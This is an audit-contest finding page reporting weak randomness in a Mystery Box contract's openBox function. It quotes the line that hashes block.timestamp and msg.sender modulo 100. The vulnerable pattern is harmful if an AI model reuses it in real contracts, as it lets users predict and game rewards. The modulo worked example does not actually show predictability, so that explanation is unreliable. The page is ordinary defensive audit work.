Mystery Box

First Flight #25

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Broken randomness in `openBox` function

blacksquirrel

Summary

Taking modulo of the hash of block.timestamp, msg.sender creates a predicted number.

uint256 randomValue = uint256(

keccak256(abi.encodePacked(block.timestamp, msg.sender))

) % 100;

Suppose the hash generation produces a very large number: 1234567890123456789012345678901234567890.
Converting this to uint256 gives us the same large number.Taking modulo 100 of this number gives us 90.
So, regardless of the actual size of the hash, our final randomValue would be 90 in this case.
1234567890123456789012345678901234567890 % 100 = 90 Because the last two digits are 90, which is less than 100.

Impact

Malicious user can predict the number and exploit openBoxfunction to get the highest reward every time.

Tools Used

Manual.

Recommendations

Randomness considerations: while this method provides a pseudo-random number, it's not cryptographically secure. For critical applications, consider using more robust random number generation methods.

Updates

Appeal created

inallhonesty Lead Judge 8 months ago

Submission Judgement Published

Validated

Assigned finding tags:

Weak Randomness

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.